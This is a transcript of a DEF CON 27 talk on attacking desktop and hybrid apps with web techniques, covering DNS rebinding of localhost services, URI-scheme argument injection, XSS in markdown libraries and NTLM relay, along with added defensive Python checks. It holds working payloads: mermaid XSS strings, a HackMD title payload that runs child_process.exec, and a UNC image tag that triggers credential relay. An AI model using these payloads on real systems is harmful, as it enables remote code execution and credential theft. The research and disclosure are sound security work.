DEF CON 27 Hacking Conference Presentation

82

Web2Own: ATTACKING DESKTOP APPS FROM WEB SECURITY'S PERSPECTIVE

Transcript of DEF CON 27 Hacking Conference Presentation

Page 1

Web2Own: Attacking Desktop Apps from Web Security's Perspective

Page 2

Who are we

• @md5_salt

• Tencent Security Xuanwu Lab

• Member of 0ops CTF Team

• Speaker of ZeroNights 2018 and HITB 2018 Dubai

Page 3

Who are we

• @Hearmen1

• Security Researcher in Tencent Security Xuanwu Lab

• Speaker of AsiaSecWest 2018

Page 4

Who are we

• @T0m4to_

• Security Researcher in Tencent Security Xuanwu Lab

• Member of Syclover Security Team

• Speaker of ZeroNights 2018 and HITB 2018 Dubai

Page 5

Background

Page 6

Attacking desktop apps

Page 7

I know about web security
I can do little reversing
I know nothing about pwning

Can I pop up a like people in Pwn2Own?

Page 8

Page 9

Traditional apps vs hybrid apps

VS

Page 10

Keep web security great

Page 11

Attack surfaces overview

Page 12

• Opened ports

• URI schemes

• App features

Page 13

Opened Ports

Page 14

Why open ports

• Webserver
  • local dynamic website
  • API call

• Debugging

• Others

Page 15

How to access these ports?

• bind on 0.0.0.0

• bind on localhost

• browser is our good friend
  • HTTP protocol
  • tolerance of illegal commands

Page 16

Same Origin Policy (SOP)

• Two pages have the same:
  • protocol, host, port

• Default behaviors in browsers

                                    same origin   different origin
send simple requests                ✓             ✓
send requests with custom headers   ✓             ✘
get response                        ✓             ✘

Page 17

DNS Rebinding

Pull payload: rebind.com -> x.x.x.x
DNS changed: rebind.com -> 127.0.0.1
Attack: rebind.com -> 127.0.0.1 (same origin, bypass SOP)

Page 18

DNS Rebinding prerequisites

• Web service does not check the hostname

• Victim would wait until DNS has changed
  • Browser has a DNS cache

Page 19

CSRF vs DNS Rebinding

                        DNS Rebinding   CSRF
Bypass SOP              ✓               ✘
Pass hostname check     ✘               ✓
effective immediately   ✘               ✓

Page 20

Case study: A popular third party plugin

• WeChatPlugin-MacOS
  • Keep the recalled message
  • Auto reply a message
  • …

• 13000 stars / 2000 forks

• Stopped being maintained months ago

https://github.com/TKkk-iOSer/WeChatPlugin-MacOS

Page 21

Attacking with DNS Rebinding

• Bind on 127.0.0.1:52700
  • /wechat-plugin/user
  • /wechat-plugin/chatlog
  • /wechat-plugin/send-message

• Stay on the evil page, attacker can...
  • Get all friends
  • Get all chatlogs
  • Send any message to any user

https://xlab.tencent.com/cn/2018/10/23/weixin-cheater-risks/

Page 22

Fix?

• Still affected by CSRF attack
  • Send any message to a known user

https://github.com/TKkk-iOSer/WeChatPlugin-MacOS/commit/3bf0a352ddbd85250eb00c3f4ed21bb7810b77f4

    NSString *hostname = request.headers[@"Host"];
    NSString *url1 = [NSString stringWithFormat:@"127.0.0.1:%d", port];
    NSString *url2 = [NSString stringWithFormat:@"localhost:%d", port];
    if (!([hostname isEqualToString:url1] | [hostname isEqualToString:url2])) {
        return [GCDWebServerResponse responseWithStatusCode:404];
    }

Page 23

Lessons learned

• Always check the host
  • Keep DNS rebinding away

• Use unpredictable data/path
  • Prevent CSRF attack

• Avoid using third party plugins
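As an added example (not the WeChatPlugin-MacOS project's code), a request gate in Python that applies the lessons above: it rejects a Host header that is not a loopback name with the expected port (what a DNS-rebound request carries), rejects a cross-site Origin, and requires a per-launch token in the query string. The port is the one from the slides; the token and the sample requests are constructed.

```python
"""Request gate for a localhost-bound HTTP service (added example, not code
from the WeChatPlugin-MacOS project). Port from the slides; token constructed."""
import secrets
from urllib.parse import urlsplit

PORT = 52700                       # the plugin's listening port (from the slides)
TOKEN = secrets.token_urlsafe(16)  # per-launch secret, shown only to the local UI


def allowed_hosts(port: int) -> set:
    """Host header values a legitimate local client can present."""
    return {f"127.0.0.1:{port}", f"localhost:{port}", f"[::1]:{port}"}


def host_ok(headers: dict, port: int) -> bool:
    """DNS rebinding delivers requests whose Host is the attacker's domain
    (rebind.com:52700) although the socket is local. Reject any Host that is
    not a loopback name with the expected port; a missing Host is rejected too."""
    host = headers.get("Host", "").strip().lower()
    return host in allowed_hosts(port)


def origin_ok(headers: dict, port: int) -> bool:
    """A CSRF request from a web page carries the attacker's Origin. Requests
    without Origin are allowed only because the token check still applies."""
    origin = headers.get("Origin")
    if origin is None:
        return True
    parts = urlsplit(origin)
    return f"{parts.hostname}:{parts.port or port}" in allowed_hosts(port)


def token_ok(path: str, token: str) -> bool:
    """The unpredictable data/path: every call must carry the per-launch token,
    which a cross-site page cannot know. Compared in constant time."""
    for pair in urlsplit(path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "token" and secrets.compare_digest(value, token):
            return True
    return False


def authorize(method: str, path: str, headers: dict,
              port: int = PORT, token: str = TOKEN) -> tuple:
    """Return (status, reason). 404 mirrors the plugin's fix so that probing
    does not confirm which paths exist."""
    if not host_ok(headers, port):
        return 404, "bad Host (possible DNS rebinding)"
    if not origin_ok(headers, port):
        return 403, "cross-site Origin (possible CSRF)"
    if not token_ok(path, token):
        return 403, "missing or wrong token"
    return 200, "ok"


if __name__ == "__main__":
    # Constructed requests: a rebinding attempt, a CSRF attempt, a legitimate call.
    print(authorize("GET", "/wechat-plugin/user", {"Host": "rebind.com:52700"}))
    print(authorize("POST", f"/wechat-plugin/send-message?token={TOKEN}",
                    {"Host": "127.0.0.1:52700", "Origin": "http://evil.example"}))
    print(authorize("GET", f"/wechat-plugin/chatlog?token={TOKEN}",
                    {"Host": "localhost:52700"}))
```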

Page 24

Case study: Xdebug

• PHP debugging extension

• How does it work?
  • Request with XDEBUG_SESSION_START in params
  • http://127.0.0.1/index.php?XDEBUG_SESSION_START
  • Xdebug connects to a server
  • Server interacts with Xdebug using DBGP commands

• Which server to connect? (in a fallback order)
  • xdebug.remote_host
  • X-Forwarded-For
  • Remote Addr

Page 25

Xdebug Remote Attack

• Prerequisites
  • xdebug.remote_connect_back = 1
  • xdebug.remote_enable = 1
  • xdebug.remote_host is None
  • For most of the PHP developers, yes

• Attacking
  • Set up an evil server waiting for Xdebug to connect
  • Use DNS rebinding attack to send a X-Forwarded-For header
  • Evil server sends payload to Xdebug
  • Get a reverse shell

https://bugs.php.net/bug.php?id=76149

Page 26

Attack scenario

You are a PHP developer

You use Xdebug

If you stay on an evil page for 40-50 seconds

You may be hacked
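An added audit script (Python; not code from Xdebug or the PHP bug report) that reads an ini fragment and reports whether the prerequisites listed on the Xdebug slides are met, then rewrites the fragment to the safe form. The sample ini is constructed and uses the Xdebug 2.x setting names the slides use.

```python
"""Audit an ini fragment for the Xdebug remote-attack prerequisites above.
Added example, not code from Xdebug or the PHP bug report; SAMPLE_INI is
constructed and uses the Xdebug 2.x setting names from the slides."""
import re

# Constructed configuration of the kind the slides call typical for developers.
SAMPLE_INI = """
[xdebug]
zend_extension = xdebug.so
xdebug.remote_enable = 1
; connect back to whoever sent the request (X-Forwarded-For, then REMOTE_ADDR)
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
"""

_SETTING = re.compile(r"^\s*(xdebug\.[a-z_]+)\s*=\s*(.*?)\s*$", re.I)


def parse_xdebug_settings(ini_text: str) -> dict:
    """Return {setting: value} for xdebug.* keys; ';' and '#' start comments."""
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].split("#", 1)[0]
        m = _SETTING.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip('"\'')
    return settings


def _is_on(value: str) -> bool:
    return value.strip().lower() in {"1", "on", "true", "yes"}


def remote_attack_exposure(ini_text: str) -> list:
    """Findings that make this host a target for the DNS rebinding +
    X-Forwarded-For chain; an empty list means the chain does not apply."""
    s = parse_xdebug_settings(ini_text)
    if not _is_on(s.get("xdebug.remote_enable", "0")):
        return []      # no remote debugging at all
    if not _is_on(s.get("xdebug.remote_connect_back", "0")):
        return []      # target is the fixed remote_host (default: localhost)
    findings = ["remote_enable=1 with remote_connect_back=1: Xdebug connects "
                "to the address taken from X-Forwarded-For / REMOTE_ADDR"]
    host = s.get("xdebug.remote_host", "")
    if host:
        findings.append(f"remote_host={host} is not a mitigation: "
                        "connect_back overrides it")
    else:
        findings.append("remote_host unset: all three slide prerequisites are met")
    return findings


def hardened(ini_text: str) -> str:
    """Rewrite the fragment so Xdebug only connects to the developer's own machine."""
    s = parse_xdebug_settings(ini_text)
    s["xdebug.remote_connect_back"] = "0"
    s["xdebug.remote_host"] = "127.0.0.1"
    return "\n".join(f"{k} = {v}" for k, v in sorted(s.items()))


if __name__ == "__main__":
    for finding in remote_attack_exposure(SAMPLE_INI):
        print("-", finding)
    print(hardened(SAMPLE_INI))
```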

Page 27

Page 28

Other cases

• NodeJS Debugging port
  • http://bluec0re.blogspot.com/2018/03/cve-2018-7160-pwning-nodejs-developers.html

• Java RMI (fixed in Apr 2018)
  • RMI supports HTTP
  • Java deserialize attacks
  • https://mbechler.github.io/2018/05/21/Java-CVE-2018-2800/

Page 29

open port
  • bind on 0.0.0.0 -> attack remotely
  • bind on 127.0.0.1 -> DNS Rebinding / CSRF

Page 30

URI Schemes

Page 31

URI Schemes

• launch apps

• send message in app

Page 32

URI Scheme on Windows

• ShellExecuteW(NULL, L"open", L"code.exe --open-url %1", NULL, NULL, SW_SHOW);

• Avoid spaces, quotes, or backslashes in your URI
  • %1

Page 33

Electron CVE-2018-1000006

• Chromium parameter injection
  • renderer-cmd-prefix
  • gpu-launcher
  • utility-cmd-prefix
  • ppapi-plugin-launcher
  • ....

• ShellExecuteW(NULL, L"open", L"Chromium.exe …=cmd.exe", NULL, NULL, SW_SHOW);

• All frameworks based on Chromium may have the same issue
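The handler-side defence against the parameter injection above, as an added Python example (not Electron, VS Code or Windows code; the webtoown scheme name is made up): quote %1 in the registered command, accept only a single well-formed URI in argv, and percent-encode payload data so the Chromium switches named on the slide cannot reach the framework as separate arguments.

```python
"""Validation of a URI delivered through a Windows URI scheme (the %1 in the
registered ShellExecuteW command). Added example, not code from Electron,
VS Code or Windows; 'webtoown' is a made-up scheme name."""
import re
from urllib.parse import urlsplit, quote

SCHEME = "webtoown"
# Characters that may appear raw in a URI; everything else must be percent-encoded
# (the behaviour the KB4497935 fix enforces before the handler is launched).
_URI_SAFE = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")


def registered_command(exe_path: str) -> str:
    """Registry shell\\open\\command value: quote both the exe and %1 so a
    URI containing a space cannot become a second argv entry."""
    return f'"{exe_path}" "%1"'


def parse_scheme_argv(argv: list, scheme: str = SCHEME):
    """Return the URI the handler was launched with, or None when argv is not
    exactly one well-formed URI of our scheme. Switch injection shows up either
    as extra argv entries ('--gpu-launcher=cmd.exe') or as raw spaces/quotes
    inside the single argument; both are rejected before any framework sees them."""
    if len(argv) != 1:
        return None
    uri = argv[0]
    if not _URI_SAFE.match(uri):
        return None                 # raw space, quote, backslash or control char
    if urlsplit(uri).scheme.lower() != scheme:
        return None                 # not our scheme (covers '--switch' too)
    return uri


def encode_for_scheme(scheme: str, payload: str) -> str:
    """Build a URI for this scheme with the payload percent-encoded, so data
    such as a quote or a space round-trips as data, not as command-line syntax."""
    return f"{scheme}://{quote(payload, safe='')}"


if __name__ == "__main__":
    print(registered_command(r"C:\app\app.exe"))
    print(parse_scheme_argv(["webtoown://open/doc1"]))
    print(parse_scheme_argv(["webtoown://open", "--gpu-launcher=cmd.exe"]))
    print(parse_scheme_argv([encode_for_scheme(SCHEME, 'a b" --gpu-launcher=cmd.exe')]))
```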

Page 34

nw.js framework

• A famous desktop note application
  • 200 million users

• Inject parameter to execute command

Page 35

Responsible disclosure

• 02/21/2019 reported to Evernote

• 04/18/2019 fixed

• WINNOTE-19941

Page 36

URI Scheme is DEAD?

• Fixed in KB4497935 by Microsoft (05/29/2019)

• URI Scheme is url-encoded
  • Can not inject parameters

https://support.microsoft.com/en-hk/help/4497935/windows-10-update-kb4497935

Page 37

URI Scheme

APP

framework

Page 38

App features

Page 39

• Cross Site Scripting (XSS)

• Privileged API

• Protocol handler

Page 40

The XSS story begins from markdown editors

Page 41

js executed in the preview window

• in the year of 2016

• markdown editors
  • Mou / Macdown / VSCode ...

Page 42

How to exploit?

• preview page rendered in file domain
  • steal files on disk
  • steal credentials (account clone)

• RCE
  • privileged APIs
  • Browser 1day

Page 43

Case study: MacDown local file read

• 7875 stars / 961 forks

Page 44

Responsible disclosure

• 08/25/2016 reported to the author via email

• 09/05/2016 author planned to remove network capabilities

• 09/06/2016 insisted on a proper fix

• Still affected now

Page 45

Things are getting harder

• little XSS in markdown editors nowadays

• Content Security Policy (CSP)

• Sandbox
  • isolated context
  • no node modules (nodeIntegration=false)

• Harder to find, harder to exploit

Page 46

Let's look at libraries used by markdown editors

Page 47

mermaid

• charts / diagram

• 1193 used / 24207 stars / 1462 forks

• latest version

https://mermaidjs.github.io/

Page 48

mermaid xss * 3

    graph TD
    B --> C{<iframe src=javascript:alert`1`>}

    graph LR;A-->B;click B callback "<iframe src=javascript:alert`1`>"

    graph LR;xss-->B;click xss alert "callback"
    click B "javascript:alert`1`" "link"

Page 49

mermaid demo site

Page 50

Katex / MathJax

• math typesetting

• Katex before v0.10.0-rc (6408 used / 10705 stars / 738 forks)

• MathJax before v3-beta.3 (1216 used / 6895 stars / 982 forks)

• reported by other guys :(

Page 51

flowchart.js

• flow chart diagrams

• 448 used / 6000 stars / 897 forks

• latest version

Page 52

Sum it up

• mermaid (latest)

• MathJax (before v3-beta.3)

• Katex (before v0.10.0-rc)

• FlowChart.js (latest)

• Affect more apps than we find

Page 53

Case study: HackMD (using mermaid)

• 160,000 active users

Page 54

HackMD CSP

script-src 'self' vimeo.com https://gist.github.com www.slideshare.net 'unsafe-eval' https://assets.hackmd.io https://www.google.com https://apis.google.com https://docs.google.com https://www.dropbox.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com https://stats.g.doubleclick.net https://secure.quantserve.com https://rules.quantcount.com https://pixel.quantserve.com https://js.driftt.com https://embed.small.chat https://static.small.chat https://www.googletagmanager.com https://cdn.ravenjs.com https://browser.sentry-cdn.com 'nonce-cdbbafd5-903e-443c-bb33-c25b0cc73e21' 'sha256-EtvSSxRwce5cLeFBZbvZvDrTiRoyoXbWWwvEVciM5Ag=' 'sha256-NZb7w9GYJNUrMEidK01d3/DEtYztrtnXC/dQw7agdY4=' 'sha256-L0TsyAQLAc0koby5DCbFAwFfRs9ZxesA+4xg0QDSrdI=';

https://csp-evaluator.withgoogle.com/

Page 55

Bypass CSP using Google Tag Manager

• CSP bypass found by @k1tten

https://github.com/k1tten/writeups/blob/master/bugbounty_writeup/HackMD_XSS_%26_Bypass_CSP.md

Page 56

HackMD XSS

Page 57

HackMD desktop app

• renderer.js in privileged context

• webview tag renders page in sandbox
  • no node integration

• How to turn XSS to RCE in desktop app?

Page 58

renderer.js

• render html from sandbox in a privileged context

    webview.addEventListener('dom-ready', function () {
      // set webview title
      document.querySelector('#navbar-container .title').innerHTML = webview.getTitle()
      document.querySelector('title').innerHTML = webview.getTitle()
    })

Page 59

Redirect to exploit page using XSS

• location=http://xxxx/exploit.html
  • Trigger dom-ready

    <head><title><img src=1
    onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title>
    </head>

Page 60

Responsible disclosure

• 07/08/2019 reported to HackMD

• 07/11/2019 fixed

Page 61

HTML injection in apps

• no JavaScript execution

• phishing? advertising?

Page 62

Privileged APIs

• node modules

• custom API
  • JSBridge with wrapper
  • usually have public docs

Page 63

Case study: a popular chat app

• Billions of users

• Embedded browser with custom APIs
  • Custom APIs without domain restriction
  • Well documented for developers

• Open URLs in embedded browser
  • Send a special type of message (FeedCard Message)
  • In-app URI scheme

Page 64

Custom APIs

• app.downloadFile
  • user chooses a location to save the file

• app.openLocalFile
  • open the file directly without confirmation (macOS)

Page 65

We need +x

• ELF can not execute without +x

• Bash / Python … are opened by text editors

• .jar works

Page 66

Attack scenario

You have Java

You click a FeedCard message from a hacker

A dialog asks you to save a file

Saving a file is usually harmless, so you clicked save

You are hacked

Page 67

Responsible disclosure

• reported on 01/23/2019

• fixed in the latest version
  • Open the folder instead of the file

Page 68

Protocol handler

• http
  • render page in an untrusted context
  • browser 1day

• JavaScript
  • send request in file domain
  • steal local files

• file / SMB
  • launch program
  • NTLM Relay

be careful of <a>

Page 69

Case study: duilib

• 3099 stars / 1434 forks

• Widely used by Chinese desktop apps on Windows

• html-like tags (showhtml=true)
  • <a x>text</a> for hyperlink
  • <i x y z> for image
  • <c xxxxxx>text</c> for color

https://github.com/duilib/duilib

Page 70

a chat app

• showhtml=true

• render tags in the chat group name or personal status

Page 71

NTLM Relay attack using <i> tag

• <i \\attacker 1 1>
  • send windows credentials automatically

• once the tag is rendered on the victim's machine
  • usually without user interaction

• offline brute force
  • relay the credentials to other services

• relay to Exchange (steal emails)
  • relay to another machine that has the same password
  • …
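Detection and sanitising for text that reaches a duilib label with showhtml=true, as an added Python example (not duilib code; the tag subset is the one shown on the slides, and the sample names are constructed): it lists image references that leave the local disk, which is the relay trigger described above, and strips tags from untrusted strings such as group names and personal status.

```python
"""Checks for duilib-style rich text rendered with showhtml=true. Added example,
not duilib code; tag grammar is the slide's subset (<a x>..</a>, <i x y z>,
<c xxxxxx>..</c>) and SAMPLES are constructed (203.0.113.0/24 is TEST-NET-3)."""
import re

_TAG = re.compile(r"<(/?)([aic])(?:\s+([^>]*))?>", re.I)
# UNC path, protocol-relative path, or a URL scheme of two or more letters
# (a single letter followed by ':' is a local drive, not a scheme).
_OFF_DISK = re.compile(r"^(\\\\|//|[A-Za-z][A-Za-z0-9+.\-]+:)")


def image_sources(text: str) -> list:
    """Paths referenced by <i path count index> tags, in order of appearance."""
    sources = []
    for m in _TAG.finditer(text):
        if m.group(1) == "" and m.group(2).lower() == "i" and m.group(3):
            sources.append(m.group(3).split()[0])
    return sources


def remote_image_refs(text: str) -> list:
    """Image paths that point off the local disk (UNC share, protocol URL).
    A UNC path is the relay trigger: rendering it makes the victim's machine
    authenticate to the named host with no user interaction."""
    return [p for p in image_sources(text) if _OFF_DISK.match(p)]


def sanitize_for_showhtml(text: str) -> str:
    """Strip every tag from untrusted text before it reaches a showhtml=true
    label; plain text is left untouched."""
    return _TAG.sub("", text)


def is_trusted_markup(text: str) -> bool:
    """Allow app-generated markup only when no image reference leaves the disk."""
    return not remote_image_refs(text)


# Constructed samples: a coloured name, a group name carrying a UNC image, a local icon.
SAMPLES = [
    "<c ff0000>Release team</c>",
    r"Family chat <i \\203.0.113.7 1 1>",
    r"Support <i icons\smile.png 1 1>",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", remote_image_refs(s), "|", repr(sanitize_for_showhtml(s)))
```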

Page 72

Case study: Ghidra

• based on JAVA

• using XML to describe a project

Page 73

Ghidra XXE

• found by @sghctoma

Page 74

XXE is not enough

• steal files

• send http requests

• Can we turn it to RCE?

Page 75

Ghidra from XXE to RCE

• Java will send credentials when it encounters an NTLM-based 401 http response

• Attacker sets up a malicious http server

• Relay the credentials to SMB service

https://xlab.tencent.com/en/2019/03/18/ghidra-from-xxe-to-rce/

Page 76

Page 77

feature

XSS

Privileged API

Protocol Handler

http

JavaScript

file

Page 78

Conclusion

Page 79

Be careful while debugging

• PHP

• NodeJS

• Java (versions before Apr 2018)

Page 80

Be careful while using these libraries

• mermaid (latest)

• MathJax (before v3-beta.3)

• Katex (before v0.10.0-rc)

• FlowChart (latest)

• duilib (with showhtml=true)

• nw.js (register in URI scheme)

Page 81

Acknowledgements

• @tombkeeper
• @EvilM00n
• @CodeColorist
• @mbechler (https://github.com/mbechler)
• @bluec0re (http://bluec0re.blogspot.com)
• @k1tten (https://github.com/k1tten)
• @sghctoma
• @RicterZ (https://github.com/RicterZ)
• …

Page 82

Thanks